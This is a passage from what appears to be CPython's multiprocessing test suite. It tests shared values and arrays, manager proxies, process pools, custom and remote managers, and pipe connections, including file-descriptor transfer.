self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
